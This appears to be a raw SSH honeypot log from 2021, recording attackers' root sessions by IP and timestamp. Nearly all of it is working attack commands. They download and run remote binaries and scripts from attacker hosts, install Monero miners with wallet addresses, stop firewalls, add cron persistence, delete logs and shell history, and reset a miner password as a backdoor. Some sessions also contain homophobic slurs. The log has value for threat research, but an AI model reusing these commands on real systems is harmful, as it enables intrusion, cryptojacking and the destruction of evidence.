curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
pkill Xorg
pkill x86_64

From 142.93.255.119 16-Aug-2021 22:11:11 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://23.254.247.214/Heisenbergbins.sh; chmod 777 Heisenbergbins.sh; sh Heisenbergbins.sh; tftp 23.254.247.214 -c get Heisenbergtftp1.sh; chmod 777 Heisenbergtftp1.sh; sh Heisenbergtftp1.sh; tftp -r Heisenbergtftp2.sh -g 23.254.247.214; chmod 777 Heisenbergtftp2.sh; sh Heisenbergtftp2.sh; rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://23.254.247.214/Heisenbergbins.sh
chmod 777 Heisenbergbins.sh
sh Heisenbergbins.sh
tftp 23.254.247.214 -c get Heisenbergtftp1.sh
chmod 777 Heisenbergtftp1.sh
sh Heisenbergtftp1.sh
tftp -r Heisenbergtftp2.sh -g 23.254.247.214
chmod 777 Heisenbergtftp2.sh
sh Heisenbergtftp2.sh
rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh
rm -rf *

From 50.212.157.1 17-Aug-2021 16:18:50 ssh2 root
w
lscpu
ip a
netstat -antop
last
lastlog
yum
id richard
halt
exit suck my dick you faggot :)))
exit

From 50.212.157.1 17-Aug-2021 16:20:13 ssh2 root
wall
>>> Your pathetic hacking attempt session has been logged <<<
id richard
you see stupid fuck ... when you id richard you honeyshit tells the truth ... so ... ?? what atempt ....
wget suckmycook.com/youwantsomethinghere.tgz
wget richardisashitHONEYPOTuser.com/suckmyass

From 125.64.43.36 17-Aug-2021 20:14:35 ssh2 root
Exec echo -n juvymabm|md5sum;uname -a
echo -n juvymabm|md5sum
uname -a

From 209.141.61.41 18-Aug-2021 15:26:54 ssh2 root
Exec cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX

From 179.43.141.99 20-Aug-2021 15:56:29 ssh2 root
Exec pkill Opera; pkill Xorg; pkill x86_64; cd /tmp; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 47v9mKikPcCZCq5mDn71ssWLDQ9UkrbiE2Tgu37BueHCHULTp5F6eHG1PA7X6o5RrW3tLjKVaCKrt23ATHn25hyy81iXQVL; pkill Xorg; pkill x86_64;
pkill Opera
pkill Xorg
pkill x86_64
cd /tmp
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 47v9mKikPcCZCq5mDn71ssWLDQ9UkrbiE2Tgu37BueHCHULTp5F6eHG1PA7X6o5RrW3tLjKVaCKrt23ATHn25hyy81iXQVL
pkill Xorg
pkill x86_64

From 209.141.48.211 21-Aug-2021 06:32:58 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget 205.185.123.172/x86_64; chmod 777 *; ./x86_64 hraz.x86; rm -rf *
cat /etc/issue
cd /tmp/
rm -rf x86*
wget 205.185.123.172/x86_64
chmod 777 *
./x86_64 hraz.x86
rm -rf *

From 118.34.86.75 21-Aug-2021 09:43:43 ssh2 root
Exec top
top

From 209.141.48.211 21-Aug-2021 23:36:07 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget 205.185.123.172/x86_64; chmod 777 *; ./x86_64 hraz.x86; rm -rf *
cat /etc/issue
cd /tmp/
rm -rf x86*
wget 205.185.123.172/x86_64
chmod 777 *
./x86_64 hraz.x86
rm -rf *

From 180.215.194.46 22-Aug-2021 03:57:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/x86_64
chmod 777 x86_64
./x86_64

From 106.75.146.233 22-Aug-2021 07:13:22 ssh2 root
Exec ls /home
ls /home

From 213.233.88.52 23-Aug-2021 09:15:32 ssh2 root
python
apt-
apt-get install python3
python3
python
uname -a
id

From 185.53.199.45 23-Aug-2021 09:42:49 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd
ls
python

From 136.144.41.152 23-Aug-2021 11:23:52 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.112/hkfndfns; curl -O http://109.104.151.112/hkfndfns; chmod 777 hkfndfns; chmod +x hkfndfns; ./hkfndfns Exploit.x86; rm -rf hkfndfns; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.112/hkfndfns
curl -O http://109.104.151.112/hkfndfns
chmod 777 hkfndfns
chmod +x hkfndfns
./hkfndfns Exploit.x86
rm -rf hkfndfns
history -c

From 209.141.61.41 24-Aug-2021 05:05:29 ssh2 root
Exec cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cd /tmp
rm -rf x86*
wget http://205.185.123.172/x86_64
chmod 777 *
./x86_64 fw.x86

From 130.162.113.6 24-Aug-2021 14:58:21 ssh2 root
Exec echo -n 0pwpmcmz|md5sum;uname -a
echo -n 0pwpmcmz|md5sum
uname -a

From 178.138.99.190 24-Aug-2021 21:27:57 ssh2 root
w
lscpu
id richard
halt
cd /etc
rm -rf *
wget suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook
wget suckmydickyoufaggot.ro/suckmyDredCook suckmydickyoufaggot.ro/suckmyDredCook

From 209.141.61.41 25-Aug-2021 18:31:35 ssh2 root
Exec cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s; ./x86_64 fw.x86
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cd /tmp
rm -rf x86*
wget http://205.185.123.172/x86_64
chmod 777 *
./x86_64 fw.x86

From 180.215.194.46 26-Aug-2021 06:10:34 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:8080/lin;chmod 777 lin;./lin;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:8080/lin
chmod 777 lin
./lin
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:8080/lin;chmod 777 lin;./lin;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:8080/lin
chmod 777 lin
./lin

From 209.141.54.197 26-Aug-2021 12:03:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.94.7/wget.sh; curl -O http://107.175.94.7/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 107.175.94.7 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.175.94.7; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.175.94.7 ftp.sh ftp.sh; sh ftp.sh; rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.175.94.7/wget.sh
curl -O http://107.175.94.7/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 107.175.94.7 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 107.175.94.7
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.175.94.7 ftp.sh ftp.sh
sh ftp.sh
rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh
rm -rf *

From 178.138.99.190 26-Aug-2021 14:47:38 ssh2 root
w
lscpu
history
id richard
cawget suckmydickwget suckmydickfaggot.com/bigdick
wget suckmydickwget suckmydickfaggot.com/bigdick
halt

From 59.56.77.6 27-Aug-2021 07:09:50 ssh2 root
Exec crontab -l | { cat; echo "0 4 * * * cd /root;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:280/linv2;chmod 777 linv2;./linv2"; }|crontab -
crontab -l | { cat
echo "0 4 * * * cd /root
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:280/linv2
chmod 777 linv2
./linv2"
}|crontab -

From 59.56.77.6 27-Aug-2021 09:58:02 ssh2 root
Exec crontab -r
crontab -r

From 59.56.77.6 27-Aug-2021 10:04:14 ssh2 root
Exec yum install crontab
yum install crontab

From 59.56.77.6 27-Aug-2021 10:09:51 ssh2 root
Exec opt install crontab
opt install crontab

From 178.138.99.190 27-Aug-2021 10:24:26 ssh2 root
w
lscpu
id richard
h
halt
wget suckmydickyoufaggot.ro/bigrodick

From 59.56.77.6 27-Aug-2021 15:11:46 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:280/linv2;chmod 777 linv2;./linv2;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:280/linv2
chmod 777 linv2
./linv2

From 209.141.61.41 27-Aug-2021 21:28:55 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget 209.141.51.176/x86_64; chmod 777 x86_64; ./x86_64 hraz.x86xhed; rm -rf *; echo Hraztalag on top
cat /etc/issue
cd /tmp/
rm -rf x86*
wget 209.141.51.176/x86_64
chmod 777 x86_64
./x86_64 hraz.x86xhed
rm -rf *
echo Hraztalag on top

From 59.56.77.6 28-Aug-2021 03:35:58 ssh2 root
Exec crontab -l | { cat; echo "0 4 * * * cd /root;./linv2"; }|crontab -
crontab -l | { cat
echo "0 4 * * * cd /root
./linv2"
}|crontab -

From 82.165.236.132 28-Aug-2021 07:12:09 ssh2 root
Exec echo validd
echo validd

From 179.43.176.53 29-Aug-2021 21:57:19 ssh2 root
Exec cd /tmp; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
cd /tmp
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 109.104.151.106 30-Aug-2021 13:51:39 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf *; wget http://cnc.betaalverzoek.ir/binInfect.sh; curl -O http://cnc.betaalverzoek.ir/binInfect.sh; chmod 777 binInfect.sh; bash binInfect.sh; ./binInfect.sh;  sh binInfect.sh; tftp betaalverzoek.ir -c get binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp -r binInfect2.sh -g betaalverzoek.ir; chmod 777 binInfect2.sh; sh binInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh; sh binInfect1.sh; rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf *
wget http://cnc.betaalverzoek.ir/binInfect.sh
curl -O http://cnc.betaalverzoek.ir/binInfect.sh
chmod 777 binInfect.sh
bash binInfect.sh
./binInfect.sh
sh binInfect.sh
tftp betaalverzoek.ir -c get binInfect.sh
chmod 777 binInfect.sh
sh binInfect.sh
tftp -r binInfect2.sh -g betaalverzoek.ir
chmod 777 binInfect2.sh
sh binInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh
sh binInfect1.sh
rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh
rm -rf *

From 154.220.3.36 1-Sep-2021 02:26:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/Linux2.6
chmod 777 Linux2.6
./Linux2.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 154.220.3.36 1-Sep-2021 02:34:52 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/HU;chmod 777 HU;./HU;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/HU
chmod 777 HU
./HU
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/HU;chmod 777 HU;./HU;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/HU
chmod 777 HU
./HU

From 199.19.226.145 2-Sep-2021 07:21:41 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://185.150.117.103/x86_64; curl -O http://185.150.117.103/x86_64; chmod 777 *; ./x86_64 x86_64; pkill xmirg; pkill Xorg; pkill Opera; pkill x86
cd /tmp
rm -rf x86_64
wget http://185.150.117.103/x86_64
curl -O http://185.150.117.103/x86_64
chmod 777 *
./x86_64 x86_64
pkill xmirg
pkill Xorg
pkill Opera
pkill x86

From 209.141.61.41 2-Sep-2021 12:10:44 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget 209.141.51.176/x86_64; chmod 777 x86_64; ./x86_64 x86xhed; rm -rf *
cat /etc/issue
cd /tmp/
rm -rf x86*
wget 209.141.51.176/x86_64
chmod 777 x86_64
./x86_64 x86xhed
rm -rf *

From 199.19.226.145 2-Sep-2021 18:39:13 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://185.150.117.103/x86_64; curl -O http://185.150.117.103/x86_64; chmod 777 *; ./x86_64 x86_64; pkill xmirg; pkill Xorg; pkill Opera; pkill x86
cd /tmp
rm -rf x86_64
wget http://185.150.117.103/x86_64
curl -O http://185.150.117.103/x86_64
chmod 777 *
./x86_64 x86_64
pkill xmirg
pkill Xorg
pkill Opera
pkill x86

From 154.82.75.148 3-Sep-2021 06:59:57 ssh2 root
Exec sed -i '/linv3/d' /var/spool/cron/root
sed -i '/linv3/d' /var/spool/cron/root

From 154.82.75.148 3-Sep-2021 07:17:18 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:8080/linv3;chmod 777 linv3;./linv3;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:8080/linv3
chmod 777 linv3
./linv3

From 154.82.75.148 3-Sep-2021 07:19:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.82.111.7:8080/linv5;chmod 777 linv5;./linv5;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.82.111.7:8080/linv5
chmod 777 linv5
./linv5

From 154.82.75.148 3-Sep-2021 07:24:01 ssh2 root
Exec crontab -l | { cat; echo "0 5 * * * cd /root;./linv5"; }|crontab -
crontab -l | { cat
echo "0 5 * * * cd /root
./linv5"
}|crontab -

From 27.124.34.46 8-Sep-2021 00:23:34 ssh2 root
.

From 23.249.16.129 9-Sep-2021 04:10:44 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/X;chmod 777 X;./X;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/X
chmod 777 X
./X
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/X;chmod 777 X;./X;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/X
chmod 777 X
./X

From 23.249.16.129 9-Sep-2021 05:02:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;curl -c http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
curl -c http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64

From 23.249.16.129 9-Sep-2021 06:39:19 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;curl http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
curl http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;curl http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
curl http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64

From 209.141.36.53 10-Sep-2021 02:35:18 ssh2 root
Exec apt update -y; yum update -y; apt install curl -y; yum install curl; cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AbDso7DmSjDqQenbJaHvYbuoK1yfZ926UmGqX46THWe2vFSNrRyAzh6aME1cWYT5pMMxH6eiFdc9iecpQn7mm1zLKRxgaV
apt update -y
yum update -y
apt install curl -y
yum install curl
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AbDso7DmSjDqQenbJaHvYbuoK1yfZ926UmGqX46THWe2vFSNrRyAzh6aME1cWYT5pMMxH6eiFdc9iecpQn7mm1zLKRxgaV

From 209.141.36.53 10-Sep-2021 05:57:36 ssh2 root
Exec apt update -y; yum update -y; apt install curl -y; yum install curl; cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
apt update -y
yum update -y
apt install curl -y
yum install curl
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 23.249.16.129 10-Sep-2021 22:46:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64

From 23.249.16.129 10-Sep-2021 22:52:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/x86_64;chmod 777 x86_64;./x86_64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/x86_64
chmod 777 x86_64
./x86_64

From 23.249.16.129 11-Sep-2021 21:23:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/U;chmod 777 U;./U;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/U
chmod 777 U
./U
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/U;chmod 777 U;./U;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/U
chmod 777 U
./U

From 23.249.16.129 11-Sep-2021 21:28:56 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/U;chmod 777 U;./U;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/U
chmod 777 U
./U

From 23.249.16.129 12-Sep-2021 09:14:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://23.249.16.129:4040/X;chmod 777 X;./X;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://23.249.16.129:4040/X
chmod 777 X
./X

From 5.182.210.125 12-Sep-2021 17:31:57 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.226.72/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 45.14.226.72 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.14.226.72/Sakura.sh
chmod 777 *
sh Sakura.sh
tftp -g 45.14.226.72 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 209.141.36.53 12-Sep-2021 18:07:23 ssh2 root
Exec apt update -y; yum update -y; cd /tmp; rm -rf x86*; wget 107.189.7.16/x86_64; chmod 777 x86_64; ./x86_64 fw.x86; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AbDso7DmSjDqQenbJaHvYbuoK1yfZ926UmGqX46THWe2vFSNrRyAzh6aME1cWYT5pMMxH6eiFdc9iecpQn7mm1zLKRxgaV; cat /etc/issue
apt update -y
yum update -y
cd /tmp
rm -rf x86*
wget 107.189.7.16/x86_64
chmod 777 x86_64
./x86_64 fw.x86
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AbDso7DmSjDqQenbJaHvYbuoK1yfZ926UmGqX46THWe2vFSNrRyAzh6aME1cWYT5pMMxH6eiFdc9iecpQn7mm1zLKRxgaV
cat /etc/issue

From 209.141.36.53 13-Sep-2021 17:31:09 ssh2 root
Exec apt update -y; yum update -y; cd /tmp; rm -rf x86*; wget 107.189.7.16/x86_64; chmod 777 x86_64; ./x86_64 fw.x86; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s; cat /etc/issue
apt update -y
yum update -y
cd /tmp
rm -rf x86*
wget 107.189.7.16/x86_64
chmod 777 x86_64
./x86_64 fw.x86
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue

From 8.38.148.45 17-Sep-2021 03:38:30 ssh2 root
unset HISTFILE
w
unset HISTFILE
uname -a
cat /etc/issue
ps x
wget
ps x
w

From 107.189.12.48 20-Sep-2021 01:07:24 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 x86_64; wget http://188.213.49.167/i686; chmod 777 *; ./i686 i686; echo ur mama
cd /tmp
rm -rf x86_64
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
chmod 777 *
./x86_64 x86_64
wget http://188.213.49.167/i686
chmod 777 *
./i686 i686
echo ur mama

From 45.133.1.14 21-Sep-2021 13:45:33 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj

From 107.189.30.134 22-Sep-2021 22:02:54 ssh2 root
Exec wget 107.189.7.16/x86_64; chmod 777 *; ./x86_64 fw.x86
wget 107.189.7.16/x86_64
chmod 777 *
./x86_64 fw.x86

From 178.138.97.130 24-Sep-2021 11:00:23 ssh2 root
w
lsccpu
lscpu
history
wget
uname -a
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
rm -rf /root/.bash_history
touch /root/.bash_history
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /etc/cron.d/core*
wget 185.51.10.233/mozilla.deb
tar xf m*b
rm -rf m*b
cd .m*/.m*
./run
./autorun
cd /home
ls
wget 185.51.10.233/mozilla.deb
tar xf m*b
rm -rf m*b
cd .m*/.m*
./run
./autorun
wget -c 185.51.10.233/mozilla.deb
tar xf m*b
rm -rf m*b
cd .m*/.m*
./run
./autorun
curl -O
exit

From 104.244.75.62 25-Sep-2021 14:21:06 ssh2 root
Exec uname -a; hive-passwd 11111; echo BackdDoorListeningBaby; cd /hive-config; cat rig.conf;
uname -a
hive-passwd 11111
echo BackdDoorListeningBaby
cd /hive-config
cat rig.conf

From 104.244.75.62 25-Sep-2021 16:32:44 ssh2 root
Exec uname -a; hive-passwd 11111; echo BackdDoorListeningBaby; cd /hive-config; cat rig.conf;
uname -a
hive-passwd 11111
echo BackdDoorListeningBaby
cd /hive-config
cat rig.conf

From 34.88.203.227 26-Sep-2021 14:21:50 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://107.172.156.132/catnet.sh; curl -O http://107.172.156.132/catnet.sh; chmod 777 catnet.sh; sh catnet.sh; tftp 107.172.156.132 -c get catnet.sh; chmod 777 catnet.sh; sh catnet.sh; tftp -r catnet2.sh -g 107.172.156.132; chmod 777 catnet2.sh; sh catnet2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.172.156.132 catnet1.sh catnet1.sh; sh catnet1.sh; rm -rf catnet.sh catnet.sh catnet2.sh catnet1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://107.172.156.132/catnet.sh
curl -O http://107.172.156.132/catnet.sh
chmod 777 catnet.sh
sh catnet.sh
tftp 107.172.156.132 -c get catnet.sh
chmod 777 catnet.sh
sh catnet.sh
tftp -r catnet2.sh -g 107.172.156.132
chmod 777 catnet2.sh
sh catnet2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.172.156.132 catnet1.sh catnet1.sh
sh catnet1.sh
rm -rf catnet.sh catnet.sh catnet2.sh catnet1.sh
rm -rf *

From 20.85.219.60 27-Sep-2021 08:37:07 ssh2 root
Exec top; pkill xmrig; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
top
pkill xmrig
